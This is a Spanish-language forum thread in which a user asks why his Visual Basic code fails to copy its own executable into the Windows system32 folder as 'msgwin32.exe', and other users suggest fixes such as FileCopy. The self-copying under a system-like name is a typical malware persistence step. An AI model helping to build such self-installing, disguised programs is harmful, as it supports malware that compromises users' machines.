Autor
|
Tema: Intento que el archivo se copie a si mismo. Que estoy haciendo mal??. (Leído 4,395 veces)
|
70N1
|
Llevo un rato con esto y no doy con la solucion...
El archivo se copia a si mismo en la carpeta system32, me podreis decir que es lo que estoy haciendo mal?.
'Modulo:
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Declare Function SHFileOperation Lib "shell32.dll" Alias "SHFileOperationA" _ (lpFileOp As SHFILEOPSTRUCT) As Long
Private Const FO_COPY = &H2 Private Const FOF_ALLOWUNDO = &H40
Public Sub SHCopyFile(ByVal from_file As String, ByVal to_file As String) Dim sh_op As SHFILEOPSTRUCT
With sh_op .hWnd = 0 .wFunc = FO_COPY .pFrom = from_file & vbNullChar & vbNullChar .pTo = to_file & vbNullChar & vbNullChar .fFlags = FOF_ALLOWUNDO End With
SHFileOperation sh_op End Sub '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'En el form_load:
Dim copy As String copy = SHCopyFile([app.patch & "\msgwin32.exe"], [Environ$(windir)& "\system32\msgwin32.exe"])App.Activate (copy) ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' 'El modulo lo saque de una pagina web. 'Lo que esta en negrita es donde me tira el error.
|
|
|
|
70N1
|
|
|
cobein
|
No se porque usas SHFileOperation, podrias usar filecopy (VB), copyfile (API) o cualquier otra cosa.
Si queres usar SHFileOperation tene en cuenta que la estructura de SHFILEOPSTRUCT que esta en el Api-Guide y que muchos usan esta mal fFlags tiene que ser long.
|
|
|
|
|
|
|
70N1
|
Ya me perdi. Perdona mi ingnorancia, pero a que te refieres.... exactamente. Explicate porfavor que no lo entiendo muy bien.
fFlags = FOF_ALLOWUNDO Es a esto a lo que te refieres?.
|
|
|
|
70N1
|
|
|
|
JmHk
San google EL MEJOR!!!!!!!
|
por que no usas el filecopy es mucho mas sencillo Sintaxiz: filecopy Archivo origen, archivo destino 
|
|
|
|
|
|
|
70N1
|
Con el filecopy se puede copiar un archivo en uso?. Perdona por tardar.
|
|
|
|
70N1
|
|
|
seba123neo
|
se puede copiar si esta en uso,por lo menos desde el explorador se puede,proba abrir algo en word por ejemplo,no podes modificarlo ni borralo,pero copiarlo si podes...
saludos.
|
|
|
|
|
|
|
70N1
|
A ok. Gracias entonces. Mañana me pondre manos a la obra e intentare usar el filecopy. Buenas noches.
|
|
|
|
70N1
|
|
|
Ch3ck
Elite
|
Otra cosa es que si te encuentras programando y compilas el code la función del FileCopy no te funcionará (por lo menos en mi pc es así), simplemente observa que todo está bien y cuando compiles el ejecutable el Filecopy te funcionará.
Saludos.
|
|
|
|
|
|
|
seba123neo
|
pues a mi si me funciona cuando compilo... 
|
|
|
|
|
|
|
|
|